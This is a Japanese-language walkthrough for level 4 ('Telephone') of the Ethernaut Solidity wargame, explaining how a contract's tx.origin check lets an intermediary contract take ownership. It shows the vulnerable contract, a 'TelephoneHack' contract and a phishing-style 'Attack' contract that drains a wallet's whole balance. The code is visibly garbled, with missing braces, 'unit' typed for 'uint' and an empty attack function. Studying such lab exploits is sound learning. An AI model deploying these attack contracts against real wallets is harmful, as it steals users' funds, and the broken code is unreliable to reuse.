
Ethernaut-solution 4. Telephone



4. Telephone

Claim ownership of the contract below to complete this level.

  • Remix IDEのコツ

    Environmentは必ず 【Injected Web3】でやる



まず事前に用意しておいた Telephone.sol をcompile

TelephoneHack.solを書く,compile => deploy of contract address


Contract.owner()でowner addressを確認

await contract.owner()

Deployed Contractからfunction hackContractを呼び出して


changeOwnerできているか確認。my wallet addressになっていたらsuccess!

await contract.owner()
'0xF6eA8E869C68362eC2FA1b2159Fe459D6D8f30F5' //success
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {

  address public owner;

  constructor() public {
    owner = msg.sender;

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./Telephone.sol";

contract TelephoneHack {
    Telephone telContract;

    constructor(address _address) public {
        telContract = Telephone(_address);

    function hackContract(address _address) public {

While this example may be simple, confusing tx.origin with msg.sender can lead to phishing-style attacks, such as this.

An example of a possible attack is outlined below.

Use tx.origin to determine whose tokens to transfer, e.g.

function transfer(address _to, uint _value) {
  tokens[tx.origin] -= _value;
  tokens[_to] += _value;

Attacker gets victim to send funds to a malicious contract that calls the transfer function of the token contract, e.g.

function () payable {
  token.transfer(attackerAddress, 10000);

In this scenario, tx.origin will be the victims address (while msg.sender will be the malicious contracts address),
resulting in the funds being transferred from the victim to the attacker.


// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/*Phishing attack using tx.origin */

//Dale -> Wallet.transfer() (tx.origin = Dale) 
//Dale -> Laura's malicious contract -> Wallet.transfer() (tx.origin = Dale)

contract Wallet {
	address public owner;

	constructor() public { //anyone can deploy 
	owner = msg.sender;

	function deposit() public payable ()

	function transfer(address payable _to, unit _amount) public {//specifier amount 
	require(tx.origin == owner, "Now owner"); //dale withdraw money here, sending transaction

	_to.transfer(_amount); //she can suck out or withdraw all the money inside of this contract

	function getBalance() public view returns(unit) {
	return address(this).balance;

contract Attack {
	address payable public owner;
	Wallet wallet;

	constructor(Wallet _wallet) public {
	wallet = Wallet(_wallet); //Don't write" new" prefix. 
	owner = msg.sender; //laura is gonna be owner

	function attack() public {
	wallet.transfer(owner, address(wallet).balance);//entire balance 
	}//Laura can fool dale calling this attaack, call wallet contract address of wallet.balance
